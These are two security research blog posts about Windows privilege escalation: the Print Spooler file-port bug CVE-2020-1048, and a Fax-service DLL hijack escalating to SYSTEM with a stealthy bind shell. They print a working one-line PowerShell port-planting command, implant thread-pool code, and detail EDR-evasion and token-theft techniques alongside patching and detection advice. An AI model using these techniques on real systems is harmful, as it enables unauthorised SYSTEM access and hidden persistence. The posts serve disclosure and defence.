We started looking at the various data structures involved in keeping track of Spooler information, and came up with the following data structures, each of which has a human-readable signature which makes reverse engineering easier:

For full disclosure, it seems GitHub continues to host NT4 source code for the world to look at, and when searching for some of these types, the Spltypes.h header file repeatedly came up. We used it as an initial starting point, and then manually updated the structures based on reverse engineering.

To start with, you’ll want to find the pLocalIniSpooler pointer in Localspl.dll — this contains a pointer to INISPOOLER, which is partially shown below:

Here it is in memory:

As you can see, this key data structure points to the first INIPRINTER, the INIMONITOR, the INIENVIRONMENT, the INIPORT, the INIFORM, and the SPOOL. From here, we could start by dumping the printer, which starts with the following data structure:

In memory, for the printer the printserver PoC on GitHub creates, you’d see:

You could also choose to look at the INIPORT structures linked by the INISPOOLER earlier — or directly grab the one associated with the INIPRINTER above. Each one looks like this:

Once again, the port we created in the PoC looks like this in memory, at the time that the job is being spooled:

Finally, both the INIPORT and the INIPRINTER were pointing to the INIJOB that we created. The structure looks as such:

This should be very familiar, as it’s a different representation of much of the same data from the shadow job file as well as what EnumJob and GetJob will return. For our job, this is what it looked like in memory:

Locating and enumerating these structures gives you a good forensic overview of what the Spooler has been up to — as long as Spoolsv.exe is still running and nobody has tampered with it.

Unfortunately, as we’re about to show, that’s not something you can really depend on.

Spooling as Persistence

Since we know that the Spooler is able to print jobs even across reboots (as well as when the service exits for any reason), it stands to reason that there’s some logic present to absorb the shadow job file data and create INIJOB structures out of it.

Looking in IDA, we found he following aptly named function and associated loop, which is called during the initialization of the Local Spooler:

Essentially, this processes any shadow job file data associated with the Spooler itself (server jobs, as they’re called), and then proceeds to enumerate every INIPRINTER, get its spooler directory (typically, the default), and process its respective shadow job file data.

This is performed by ProcessShadowJobs, which mainly executes the following loop:

It’s not visible here, but the *.SHD wildcard is used as part of the FindFirstFile API, so each file matching this extension is sent to ReadShadowJob. This breaks one of our assumptions: there’s no requirement for these files to follow the naming convention we described earlier. Combining with the fact that a printer can have its own spooler directory, it means these files can be anywhere.

Looking at ReadShadowJob, it seemed that only basic validation was done of the information present in the header, and many fields were, in fact, totally optional. We constructed, by hand with a hex editor, a custom shadow job file that only had the bare minimum to associate it to a printer, and restarted the Spooler, taking a look at what we’d see in Process Monitor. We also created a matching .SPL file with the same name, where we wrote a simple string.

First, we noted the Spooler scanning for FPnnnnn SPL files, which are normally associated with EMF jobs (the FP stands for File Pool). Then, it searched for SHD files, found ours, opened the matching SPL file, and continued looking for more files. None were present, so NO MORE FILES was returned.

So, interestingly, you’ll notice how in the stack below, the DeleteOrphanFiles API is called to cleanup FP files:

But the opposite effect happens for SHD files after — the following stack shows you ProcessShadowJobs calling ReadShadowJob, as the IDA output above hypothesized.

What was the final effect of our custom placed SHD file, you ask? Well, take a look at the print queue for the printer that we created…

It’s not looking great, is it? Double-clicking on the job gives us the following, equally useless information.

Given that this job seems outright corrupt, and indicates 0 bytes of data, you’d probably expect that resuming this job will abort the operation or crash in some way. So did we! Here’s what actually happens:

The whole thing works just fine and goes off and writes the entire spool file into our printer port, actual size in the SHADOWFILE_4 be damned. What’s even crazier is that if you manually try calling ReadPrinter yourself, you won’t see any data come in, because the RPC API actually checks for this value — even though the PortThread does not!

What we’ve shown so far, is that with very subtle file system modifications, you can achieve file copy/write behavior that is not attributable to any process, especially after a reboot, unless some EDR/DFIR software somehow knew to monitor the creation of the SHD file and understood its importance. With a carefully crafted port name, you can imagine simply having the Spooler drop a PE file anywhere on disk for you (assuming you have access to the location).

But things were about to take whole different turn in our research, when we asked ourselves the question — “wait, after a reboot, how does the Spooler even manage to impersonate the original user — especially if the data in the SHD file can be NULL‘ed out?”.

Self Impersonation Privilege Escalation (SIPE)

Since Process Monitor can show impersonation tokens, we double-clicked on the CreateFile event, just as we had done at the beginning of this blog. We saw that indeed, the PortThread was impersonating… but… but…

The Spooler is impersonating… SYSTEM! It seems the code was never written to handle a situation that would arise where a user might have logged out, or rebooted, or simply the Spooler crashing, and now we can write anywhere SYSTEM can. Indeed, looking at the NT4 source code, the PrintDocumentThruPrintProcessor function just zooms through and writes into the port.

However, we’re not ones to trust 30 year old code on GitHub, so we stuck with our trusty IDA, and indeed saw the following code, which was added sometime around the Stuxnet era:

And, indeed, CanUserAccessTargetFile immediately checks if hToken is NULL, and if so, returns FALSE and sets the LastError to ERROR_ACCESS_DENIED.

Boom! Game Over! The code is safe, we checked it! Believe it or not, we’ve previously gotten this type of response to security reports (not lately!).

Clearly, something is amiss, since we saw our write go through “impersonating” SYSTEM.

This is where a very deep subtlety arises. Pay attention to this code in CreateJobEntry, which is what ultimately initializes an INIJOB, and, if needed, sets JOB_PRINT_TO_FILE.

print job is considered to be headed to a file only if the user selected the “Print to file” checkbox you see in the typical print dialog. A port, on the other hand, that’s a literal file, completely skips this check.

Well, OK then — let’s stop with this C:\Windows\Tracing\ lameness, and create a port in C:\Windows\System32\Ualapi.dll. Why this DLL? Well, you’ll see you saw in Part Two!

Hmmm, that’s not so easy:

We are caught in the act, as you can see from the following Process Monitor output:

The following stack shows how XcvData is called (an API you saw earlier) with the PortIsValid command. While you can’t see it here (it’s on the “Event” tab), the Spooler is impersonating the user at this point, and the user certainly doesn’t have write access to c:\Windows\System32!

As such, it would seem that while it’s certainly interesting that we can get the Spooler to write files to disk after a reboot / service start, without impersonation, it’s unclear how this can be useful, since a port pointing to a privileged directory must first be created. As an Administrator, it’s a great evasion and persistence trick, but you might think this is where the game stops.

While messing around with ways to abuse this behavior (and we found a few!), we also stumbled into something way, way, way, way… way simpler than the advanced techniques we were coming up with. And, it would seem, so did the folks at SafeBreach Labs, which beat us to the punch (gratz!) with CVE-2020-1048, which we’ll cover below.

Client Side Port Check Vulnerability (CVE-2020-1048)

This bug is so simple that it’s almost embarrassing once you realize all it would’ve taken is a PowerShell command.

If you scroll back up to where we showed the registry access in Spoolsv.exe as a result of Add-PrinterPort, you see a familiar XcvData stack — but going straight to XcvAddPort / DoAddPort — and not DoPortIsValid. Initially, we assumed that the registry access was being done after the file access (which we had masked out in Process Monitor), and that port validation had already occurred. But, when we enabled file system events… we never saw the CreateFile.

Using the UI, on the other hand, first showed us this stack and file system access, and then went ahead and added the port.

Yes, it was that simple. The UI dialog has a client-side check… the server, does not. And PowerShell’s WMI Print Provider Module… does not.

This isn’t because PowerShell/WMI has some special access. The code in our PoC, which uses XcvData with the AddPort command, directly gets the Spooler to add a port with zero checking.

Normally, this isn’t a big deal, because all subsequent print job operations will have the user’s token captured, and the file accesses will fail.

But not… if you reboot, or kill the Spooler in some way. While that’s not necessarily obvious for an unprivileged user, it’s not hard — especially given the complexity and age of the Spooler (and its many 3rd party drivers).

So yes, walk to any unpatched system out there — you all have Windows 7 ESUs, right? — and just write Add-PrinterPort -Name c:\windows\system32\ualapi.dllin a PowerShell window. Congratulations! You’ve just given yourself a persistent backdoor on the system. Now you just need to “print” an MZ file to a printer that you’ll install using the systems above, and you’re set.

If the system is patched, however, this won’t work. Microsoft fixed the vulnerability by now moving the PortIsValid check inside of LcmXcvDataPort. That being said, however, if a malicious port was already created, a user can still “print” to it. This is because of the behavior we explained above — the checks in CanUserAccessTargetFile do not apply to “ports pointing to files” — only when “printing to a file”.

Conclusion — Call to Action!

This bug is probably one of our favorites in Windows history, or at least one of our Top 5, due to its simplicity and age — completely broken in original versions of Windows, hardened after Stuxnet… yet still broken. When we submitted some additional related bugs (due to responsible disclosure, we don’t want to hint where these might be), we thought the underlying impersonation behavior would also be addressed, but it seems that this is meant to be by design.

Since the fix for PortIsValid does make the impersonation behavior moot for newly patched systems, but leaves them vulnerable to pre-existing ports, we really wanted to get this blog out there to warn the industry for this potentially latent threat, now that a patch is out and attackers would’ve quickly figured out the issue (load Localspl.dll in Diaphora — the two line call to PortIsValid jumps out at you as the only change in the binary).

There are two steps you should immediately take:

  1. Patch! This bug is ridiculously easy to exploit, both as an interactive user and from limited remote-local contexts as well.
  2. Scan for any file-based ports with either Get-PrinterPorts in PowerShell, or just dump HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports. Any ports that have a file path in them — especially ending in an extension such as .DLL or .EXE should be treated with extreme prejudice.
Read our other blog posts:

Faxing Your Way to SYSTEM — Part Two

“Part two?”, you ask. “Where’s part one?”, you wonder. In this blog post, we are doing things backwards — first publishing a Part Two, with a theoretical “What if?” scenario, and then we’ll follow with a Part One to fill in our gap.

Posit a DLL Hijack

Let’s say you have a way to dump a custom DLL in a privileged directory. You can name the DLL whatever you want and make a privileged process load it instead of one of its own, as part of a privilege escalation attack. This is most useful when there is a process looking for a DLL that is not usually found in the system, so you don’t have to implement all the functionality of the DLL you’re replacing and/or potentially have to deal with the DLL already being in use . This technique goes under a variety of names such as DLL hijacking and binary planting, and it’s a method that has been known and used for many years. It can also be used a persistence mechanism, when the goal is to load every system start.

Unfortunately, there’s not a whole lot of real world public information on actually implementing the technique end-to-end, especially for privilege escalation, without relying on gimmicks. To successfully execute your code, you need:

  • A built-in, Windows native, privileged process that tries loading a non-existent DLL from a privileged directory (if it’s from an unprivileged directory, you have an even bigger problem)
  • A way to reliably start the privileged process, from an unprivileged context
    • Online sources resort to gimmicks such as “run these commands in a loop and after 20 tries you’ll get Xxx.exe” or “and now reboot the machine!”

This really doesn’t sound hard, but we could not find anything online that accurately fulfilled these two requirements. So, while in this post, we’re not claiming anything novel, we will combine some obscure Windows Internals together to weaponize a bind shell (see? we told you it wasn’t novel — it’s not even a reverse shell) with some neat EDR bypasses and forensic gotchas, in order to get some offensive capabilities out in the open and into defenders’ mindsets. You’ll see (and might learn) how to:

  • Identify services that can be started by non-privileged users, so that you can repeat this research and potentially find your own service
  • Talk about trigger started services, and provide another way to launch services from a non-privileged user account
  • Use a previously unused service which is vulnerable to a DLL hijack, which reduces chance of detection, and introduces a reliable escalation vector
  • Leverage the Windows Thread Pool API for additional stealth, leveraging arbitrary threads and harder-to-infer malicious behavior, often whitelisted by EDR
  • Use some more esoteric, high-performance Windows Socket APIs, which results in less standard imports (no socket, accept, recv, or send) and simpler code
  • Abuse the Windows Socket API to hide and misdirect the owner process from Netstat, Process Hacker, Process Monitor, and even WFP (Windows Filtering Platform) and BFE (Base Filtering Engine)-based firewall solutions.
  • Escalate privileges from NETWORK SERVICE to SYSTEM, without any “bean” or “potato”-based DCOM/HTTP attacks
  • Launch a process as SYSTEM in a non-traditional way using process reparenting
  • Awesome DLL hijacking in Windows Defender ATP and Windows 21H1 (“Manganese”), for the lulz

We will be heavily relying on existing research from other people here, so we want to make sure there is no implied claim that these are hyped-up “never before seen” techniques. We just packaged them up nicely with a bow.

Surveying the Landscape

If you search online, you’ll find four commonly used built-in services (even more 3rd party) on Windows that are vulnerable to a DLL hijack:

  1. Wmiprvse.exe, which likes to load loads of things from c:\windows\system32\wbem\, especially Wbemcomn.dll
    1. But it often impersonates the caller when you run WMI commands yourself, so now you need to get a privileged process to issue a WMI command to spawn a WMI Provider
    2. We could not find reliable sources online on how to operationally achieve this 100% of the time
    3. This is a well-known service and target DLL, often abused by malware, and in almost everyone’s PoCs
  2. Ikeext.dll (running in a Svchost.exe) which loads Wlcsctrl.dll from c:\windows\system32\
    1. This is already running in corporate environments with a VPN — online sources assume you can just sc stop it , but that privilege is only granted to Administrators.
    2. If it’s not already running, you cannot just sc start it. The common technique is to use Rasdial.exe to trigger it to start.
    3. Extremely well-known, abused in the wild, a dozen blog posts on the topic
  3. Sessenv.dll (running in a Svchost.exe) which loads Tsmsisrv.dll from c:\windows\system32\
    1. This one has the advantage of not typically running unless you’ve hit an RDP machine
    2. But it does not grant Start/Stop privileges to unprivileged users and does not have an obvious trigger to start it
    3. Well known and has been abused in the wild for persistence
  4. Searchprotocolhost.exe and Searchindexer.exe will load Msfte.dll from c:\windows\system32\
    1. Cannot be directly started by a non-privileged user, but can often be “triggered” by noisy file-system activity
    2. Well known and catalogued, and also used in the wild by APT groups

In all of these scenarios, Administrator access was already assumed (i.e.: these were mechanisms for persistence, not privilege escalation), or there were unreliable ways to “maybe” trigger the service to start. Additionally, these techniques were known and probably detected by major AV and EDR vendors. We wanted something a little bit more interesting.

Finding the Target — User Startable Services

First, our interest was to identify services that are vulnerable to DLL hijacking attempts other than the afore-mentioned ones. Figuring this out is old & tired infosec practice — run Process Monitor with the right filters, start a bunch of services (or reboot the box), profit! Countless tutorials online can help you learn how to do this. We applied some different twists, however, which are worth going into. First, remember that a reboot is unacceptable in our use case — we want to elevate privileges now. So we had to rely on starting services that weren’t already started — or finding a service that can be stopped by a standard user. Second, many online tutorials will have you only looking at SYSTEM processes. While that is the jackpot, many services run as LOCAL SERVICE and NETWORK SERVICE — two accounts that while not “privileged” from an Administrator Group perspective, can easily elevate to SYSTEM using a few different tactics.

Finally, starting a service typically requires administrative permissions, which defeats our purpose (and so does stopping a service in case it’s already running). We needed to find exceptions to this rule. There are two great tools for looking into service permissions. One is Process Hacker, which allows you, from its Services tab, to double click on a service, and then click the Permissions button on the General tab. For example, here are the permissions for the SessionEnv service:

Well, already, we see that there’s no “Everyone“, “Users” or “Authenticated Users“, which are common groups that include unprivileged users. But there is INTERACTIVE“, a less commonly seen group that also includes unprivileged users. Now we can double-click on the ACE and see the following:

So that’s not great — all we can really do is query the service and talk to it through SCM control codes.

While nice and graphical, this technique takes time — going down 200 services and clicking a bunch of boxes. So while Process Hacker is great to check one-off services, we wanted a tool to automate this. Enter the venerable Systems Internals Suite, with the AccessChk tool. The following command-line is a great way to get a one-line view of all service permissions:

accesschk.exe -c * -L > servsddl.txt

And you’ll have output like this:

AJRouter
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)S:

ALG
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:

AppIDSvc
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:

Appinfo
    O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA
(A;;CCLCSW
RPLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)S:

Reading SDDL strings can be a bit challenging, but what we’re looking for specifically is the “RP” right, which maps to SERVICE_START. And we’d like to see that next to either “IU“, which is the “INTERACTIVE” group, or “BU” for the “Users” group, or “AU“, which is the “Authenticated Users” group, or even better, “WD“, which is the “Everyone” group. You might even get lucky and find “AC“, which is the “ALL_APPLICATION_PACKAGES” group.

Once you find an interesting-looking service, say, “DsSvc“, you can replace the command-line command with a lower case l instead:

\sysint\accesschk.exe -c DsSvc -l
[4] ACCESS_ALLOWED_ACE_TYPE: Everyone
    SERVICE_QUERY_STATUS
    SERVICE_START
[5] ACCESS_ALLOWED_ACE_TYPE: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
    SERVICE_QUERY_STATUS
    SERVICE_START

So this certainly sounds and seems like an interesting service! The next step is to then run it through the usual suspect — Process Monitor — and try to see any  “NAME NOT FOUND” errors while looking for DLLs. You need to be a little careful here, as this is something a lot of blog posts don’t talk about: you might find “red herrings”. For example, Windows Defender does lookup a lot of DLL paths, as part of its sandbox/heuristics, but these aren’t actual LoadLibrary calls. We’ve also seen services loading Mfc42.dll, which looked promising, but a deeper analysis of the call stack showed the LoadLibraryAsDataFile function, which doesn’t actually execute code or call any entrypoints/exports.

Since DsSvc wasn’t fruitful, we moved on (our search query was to look for “RP;;WD“, just to go for the most egregious cases, but there are certainly other candidates too). Next up in our results was:

\sysint\accesschk.exe -c fax -l
[0] ACCESS_ALLOWED_ACE_TYPE: Everyone
    SERVICE_QUERY_STATUS
    SERVICE_START

We didn’t know it yet, but we were about to hit a jackpot.

For completeness’ sake, the only other 3 built-in Windows services which allow “Everyone” to launch them are icssvc, PhoneSvc, and TabletInputService. There are more that allow INTERACTIVE, Authenticated Users, and Users, however.

User Startable Services — Round Two

Before going deep into the Fax Service, it’s worth talking about another way that a service can be started, regardless of the permissions associated with it. In Windows Vista, Microsoft introduced the Unified Background Process Manager (UBPM), which mimics the functionality of systemd on Linux systems or launchd on macOS — it supports a variety of “triggers”, which can be associated with system events such as PnP Device Arrival Notifications, RPC Endpoint Lookups, WNF State Notifications, Socket Connections, or even ETW Events.

The Service Control Manager (SCM) was then updated to allow services to be started based on a trigger, and you can use Process Hacker for a nice GUI view of the triggers that a service has. Here are the ones for TabletInputService:

Device Interface Arrival notifications aren’t great, since there’s no way to “fake” them from an unprivileged account (as far as we know). But let’s take a look at another example, the DsSvc service — and let’s actually showcase another tool that can dump trigger information: the Sc.exe built-in utility itself:

sc qtriggerinfo DsSvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE_NAME: DsSvc
    START SERVICE
        NETWORK EVENT                : bc90d167-9470-4139-a9ba-be0bbbf5b74d [RPC INTERFACE EVENT]
          DATA                       : BF4DC912-E52F-4904-8EBE-9317C1BDD497

What does this tell us? First, the first GUID, labelled as RPC INTERFACE EVENT has this to say on MSDN:
“The event is triggered when an endpoint resolution request arrives for the RPC interface GUID specified by pDataItems.”
Well, since any user account is permitted to resolve an RPC endpoint, then talking to the RPC endpoint mapper to resolve this GUID will launch the service — even if we don’t ultimately have permissions to connect to it. Here’s the service currently lying dormant:

sc query dssvc
SERVICE_NAME: dssvc
    TYPE               : 30  WIN32
    STATE              : 1  STOPPED

And here’s us trying to ping the Interface ID that was specified:

rpcping -t ncalrpc -f BF4DC912-E52F-4904-8EBE-9317C1BDD497 -v 2

RPCPing v6.0. Copyright (C) Microsoft Corporation, 2002-2006
Trying to resolve interface BF4DC912-E52F-4904-8EBE9317C1BDD497, Version: 1.0
Completed 1 calls in 1 ms
1000 T/S or   1.000 ms/T

We can see that the interface replied back to our ping! Let’s take a look at the service now:

sc query dssvc
SERVICE_NAME: dssvc
    TYPE               : 30  WIN32
    STATE              : 4  RUNNING
                         (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)

Another type of accessible trigger is the ETW Trigger. Here’s an example service that uses it, the Windows Error Reporting Service:

sc qtriggerinfo WerSvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE_NAME: WerSvc
        START SERVICE
            CUSTOM     : e46eead8-0c54-4489-9898-8fa79d059e0e [ETW PROVIDER UUID]

All it takes is a simple call to EventWrite with the correct ETW GUID, and the service will start. You can do this in C, or even in PowerShell. We modified the linked PS script to use the GUID below instead of the provided one:

new Guid(0xe46eead8, 0x0c54, 0x4489, 0x98, 0x98, 0x8f, 0xa7, 0x9d, 0x05, 0x9e, 0x0e);

And, sure enough, after launching the script:

sc query WerSvc
SERVICE_NAME: WerSvc
    TYPE               : 10  WIN32_OWN_PROCESS
    STATE              : 4  RUNNING
                            (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)

There’s a few other interesting triggers too — and Microsoft documents the official ones here. For example, you’ll see that the IKEEXT service is spawned by Rasdial.exe due to a trigger on UDP port 500 (which you could fake in other ways than launching Rasdial.exe).

Abusing Fax

Going back to Process Monitor, when we ran the fax service, we noticed this: 

Fxssvc.exe was looking for c:\windows\system32\ualapi.dll — unsuccessfully. So we placed our DLL in that location, started the service and sure enough, it was loaded into the process! 

But then we had a few problems:

  1. The service doesn’t run under the SYSTEM account, but under NETWORK SERVICE. This isn’t a truly privileged account, so there’s more work to be done.
  2. The service looks up some exports using GetProcAddress, which it expects to find in Ualapi.dll
  3. Unless you’re actually queueing a fax, the service exits almost as soon as it starts (there are a lot of unfortunately named “suicide” variables in the symbols), meaning we can’t have persistent threads lying around.

We wanted to solve for 2 & 3 together — normally, malicious privilege escalation attacks leverage DllMain in order to perform their next steps, but in our case, the need to elevate to SYSTEM makes things harder — plus the fact we want to have an embedded bind shell developed in a smarter way. Secondly, encoding an entire payload in DllMain is highly suspicious to anyone disassembling the binary. And finally, DllMain is called when the DLL is loaded, which means that the loader lock is held, greatly diminishing our capabilities.

Therefore, we skirted the entire problem by not having an entrypoint in the DLL at all, and leveraging the way the Fax service calls the Ualapi.dll, which you can see in the IDA screenshot below:

Since the service expects all three functions present, we export all of them, and then implement a UalStart function where we write our logic — safely away from the confines of the loader lock. Normally we’d have done all of our operational setup here, but we wanted to be sneaky, and leverage the Windows Thread Pool, which affords us some asynchronicity, makes call stacks harder to understand, and brings pain to EDR tools.

The main body of our UalStart is actually quite simple:


//
// Create the thread pool that we'll use for the work
//

pool = CreateThreadpool(NULL);
if (pool == NULL)
{
    goto Failure;
}


//
// Create the cleanup group for it
//
cleanupGroup = CreateThreadpoolCleanupGroup();
if (cleanupGroup == NULL)
{
    goto Failure;
}

//
// Configure the pool
//
InitializeThreadpoolEnvironment(&CallBackEnviron);
SetThreadpoolCallbackPool(&CallBackEnviron, pool);
SetThreadpoolCallbackCleanupGroup(&CallBackEnviron, cleanupGroup, NULL);

//
// For now, always stay in this loop
//
while (1)
{
    //
    // Execute the work callback that will take care of
    //
    work = CreateThreadpoolWork(WorkCallback, NULL, &CallBackEnviron);
    if (work == NULL)
    {
        goto Failure;
    }

    //
    // Send the work and wait for it to complete
    //
    SubmitThreadpoolWork(work);
    WaitForThreadpoolWorkCallbacks(work, FALSE);

    //
    // We're done with this work
    //
    CloseThreadpoolWork(work);
}

It not only provides the benefits of the thread pool evasion/abstraction, but also means that UalStart will never return — keeping the Fax service from shutting down, and additionally putting it in a perpetual SERVICE_START_PENDING state, which is unstoppable through regular Sc.exe commands. We now have a persistent implant on the system — but we still want to get to a SYSTEM shell.

An Elevated Fax

Now that we have our NETWORK SERVICE implant, it’s time to head on over to SYSTEM. When this account was first introduced in Windows XP, alongside its breatheren LOCAL SERVICE, the idea was to have service accounts with reduced privileges and permissions, most especially that would not belong to the Administrators group.

However, since these are services, they were given the SeImpersonatePrivilege, which means they can impersonate a more powerful token as long as someone more privilege connects and/or speaks to them, through Winsock, Named Pipes, or ALPC. Technically, this privilege can be dropped from a given Svchost.exe by using the RequiredPrivileges registry value, but few services do so., and as you can see below, Fax does not (in fact, it even has the SeAssignPrimaryTokenPrivilege too):


Therefore, our initial idea was to open a handle to the RpcSs service, which holds handles to lots of different tokens, including SYSTEM tokens:

The Fax service, which runs in Fxssrv.exe, has the impersonation privilege, and therefore we should be able to duplicate one of these tokens and impersonate it, elevating ourselves to SYSTEM. Unfortunately, unless you’re running Windows XP (i.e.: reading this blog during a BlackHat Advanced Windows Exploitation Course), this simply won’t work.

This is due to the fact that since Windows Vista, services have been hardened, as described in the Windows Internals books as well as in this excellent blog by James Forshaw. That being said, over the years, as was shown countless times, the “isolation” between the services did not truly mean much. Multiple attacks were shown, which we’ll enumerate and reference here, alongside with mitigations:

  • Simply spoofing an endpoint supposedly owned by another service, and getting a SYSTEM process to connect, then impersonating it
  • Finding another service that shares the same Svchost.exe instance, and simply using its own SYSTEM-level impersonation tokens, since the handle table is shared
    • Windows 10 Redstone 2 now isolates services in their own separate Svchost.exe instances, on systems with over 3.5GB of RAM
  • Opening a handle to another Svchost.exe instance which has SYSTEM-level impersonation tokens, and duplicating them
    • In Windows Vista, each NETWORK SERVICE process has its own Logon ID (LUID), and the process object is ACL’ed such that only SYSTEM and the unique per-service Logon ID have access to it
  • Opening a handle to a thread in another Svchost.exe instance and sending an APC to duplicate a SYSTEM-level impersonation token
    • In Windows Vista, the thread objects are all owned by NETWORK SERVICE, but use an OWNER RIGHTS ACE, also introduced in Vista, in order to strip out any privileged permissions.
  • Leveraging loopback network authentication attacks to coerce a more privileged service from authenticating over NTLM with its SYSTEM token
  • Abusing the fact that the DOS Device Map is shared among all NETWORK SERVICE services, and performing a DLL path resolution attack
    • No mitigation
  • Leveraging loopback named pipe authentication attacks to trick LSASS into returning a more privileged NETWORK SERVICE token
    • No mitigation, and the approach we chose. As always, James wrote another blog post describing this technique.

The idea is simple — while we can’t directly open a handle to RpcSs, we can create a named pipe, then open it back using the \\localhost SMB namespace (instead of \\.), and then impersonate it. This will cause the SMB driver to call AcquireCredentialsHandle to obtain a NETWORK SERVICE token (our current account), which it does by passing in the LUID. In turn, LSASS returns the original token that was created to represent the logon session as whole — which just so happens to be the RpcSs token, since this is normally the first service running as NETWORK SERVICE. In other words, we just got the same LUID as RpcSs, and we can now open a handle to it!

Here’s a screenshot of our worker thread’s token after impersonating the named pipe. Notice how many more privileges it has, and the new LogonSession group it joined: 

 

A SYSTEM Fax

Because we now have the same token as RpcSs, we can freely open a handle to it, with all the way up to PROCESS_ALL_ACCESS. We then implemented a handle scanning algorithm similar to previous ones demonstrated, but with a few twists that take advantage of more modern Windows functionality:

  1. We use the ProcessHandleInformation class of NtQueryInformationProcess to enumerate the process handles. Previous research and PoCs brute-forced each possible handle, which is a much slower approach. A few other sources used the SystemHandleInformation class of NtQuerySystemInformation, which is slower because it enumerates all handles – requiring filtering to find the right process.
  2. We open our own token, then use NtQueryObject’s ObjectTypeInformation class to get the Object Type Index for Token Objects (which can vary from version to version, depending on initialization order). This allows us to filter the result list in #1 quickly without calling DuplicateHandle and then DuplicateToken on every handle, like past sources, nor do we need to do a name comparison on the Type Name.
  3. Now that we know we are dealing with a token handle, we also check the DesiredAccess field to select only tokens where the granted access mask is TOKEN_ALL_ACCESS. This increases the chance that we find highly privileged interesting tokens that we can then impersonate.
  4. On most systems, it then only takes us 2-3 calls to DuplicateHandle before we find an appropriate SYSTEM token.

What do we consider an “appropriate” token, by the way? First, we check the AuthenticationId (LUID) to ensure it is 0x3E7 (SYSTEM_LUID). Next, we check the PrivilegeCount to make sure it is equal to or above 22, which is the normal amount of privileges that a Windows 10 SYSTEM token has – some services run with filtered tokens, so RpcSs may impersonate such reduced SYSTEM tokens from time to time. We wanted the real deal. Thankfully, both of these checks can be quickly done with the TokenStatistics class of GetTokenInformation.

Finally, after calling SetThreadToken, our thread now runs with a SYSTEM token that has all privileges present and enabled:


Armed with this token, we open a handle to yet another service: DcomLaunch. Once the handle’s been opened, we revert the token back to the original NETWORK SERVICE. The short duration of our impersonation, and the fact we merely open a handle and nothing else, helps keep us low on EDR tool’s visibility.

So – why DcomLaunch? We had two additional operational goals that we wanted to play with. First, we wanted to launch the perennial shell, but without having a SYSTEM-token’ed Cmd.exe underneath the… Fax service, sticking out like a sore thumb.

Additionally, we wanted to avoid having to use SeAssignPrimaryTokenPrivilege and doing the obvious “impersonate a SYSTEM token and set it as a primary process token”, so that we could use the sneakier PROCESS_CREATE_PROCESS technique. In case this doesn’t ring a bell, it essentially relies on the Windows behavior of automatically launching children process with the token of their parent and combines it with the Windows Vista feature of allowing “re-parenting”. The link above has James (again!) original presentation on this, which he also describes on a blog post (and related functionality in his PowerShell tools).

This capability means that all Unix-like fork behavior (environment variable inheritance, handle inheritance, standard input/out inheritance, and the token duplication) will be based on the chosen parent process, and not the actual creator process. It also evades many EDR solutions that automatically assume the parent is the creator, and ultimately will make it such that Cmd.exe will appear in the process tree of the Svchost.exe that hosts DcomLaunch.

Why did we pick this service? Well… just take a look at how its process tree normally looks like:


Would you notice another Cmd.exe window in all this mess? 

Binding to a Socket

For an interactive local attacker, a SYSTEM Cmd.exe is great for privilege escalation, but a persistent backdoor that allows remote access is a lot more versatile (and a local attacker could bind to it as well).

In the real world, these types of shells are usually setup as “reverse shells” in order to avoid firewall rules around inbound connections. But we didn’t want to fully weaponize the entire chain and create a beaconing & C2 infrastructure, so we wrote a simple bind shell instead.

While this isn’t novel, we did want to use some Windows Internals knowledge to spice it up a little. First, we continued with our approach of leveraging the Windows Thread Pool API, and used the AcceptEx function which has a very different approach to establishing a Winsock connection vs. the usual BSD Socket API:

  • Instead of creating and returning a client-side socket after a connection is made, AcceptEx expects the caller to have already created the (unbounded) socket and pass in as an input
  • Instead of blocking, it pushes a completion packet to an I/O completion port (“overlapped I/O” in Win32 parlance), which can then be associated with a callback function using the Thread Pool API.
  • It does not consider the connection accepted (and thus does not wake up the I/O completion port) until at least one packet has been sent by the client – and it returns back what the first client packet’s data payload was.
  • It automatically fills out the local and remote SOCKADDR structures that represent the server and client IP and Port tuple
  • It’s not directly exported by the Winsock library (Ws2_32.dll) because it is a specialized Microsoft Extension. Instead, you must use WSAIoctl with SIO_GET_EXTENSION_FUNCTION_POINTER to look it up by GUID (this isn’t even documented on WSAIoctl’s documentation as a valid command!)

As you can see, AcceptEx is quite strange – but also quite useful for what we were going for. Therefore, the last step our Thread Pool Work Callback will do is create two sockets – a listening socket and an unbound socket, bind the listening socket, and pass both as input to AcceptEx after looking up its pointer. Looking up the local IP address and building the SOCKADDR for bind is done using GetAddrInfoW (vs. gethostbyname), a more modern and easier to use API, and the sockets are created with WSASocket instead of socket – you’ll see why soon.

Finally, we pump an I/O completion into the thread pool and then wait for our callback to complete. Now UalStart is waiting on the work callback to return, and the work callback is waiting on the I/O callback to return. Thread stacks in Process Hacker won’t immediately show anything nefarious going on (such as someone blocked on accept from within a DLL), and our operations are spread out over 3 different threads (none of which we directly created).

Creating the SYSTEM Bind Shell

Eventually, a client connects to our remote endpoint and sends a packet. At this point, our I/O callback will execute. The reason we wanted this “send a packet” behavior is to avoid spuriously waking up due to someone doing port scanning and randomly trying to connect to our port. With AcceptEx, actual data must first be sent. This, in turn, also gives us the opportunity to validate that the input packet contains the right (expected) connection payload, which in our case is the string let me in\n – this made it easier to play with Netcat to test our shell out.

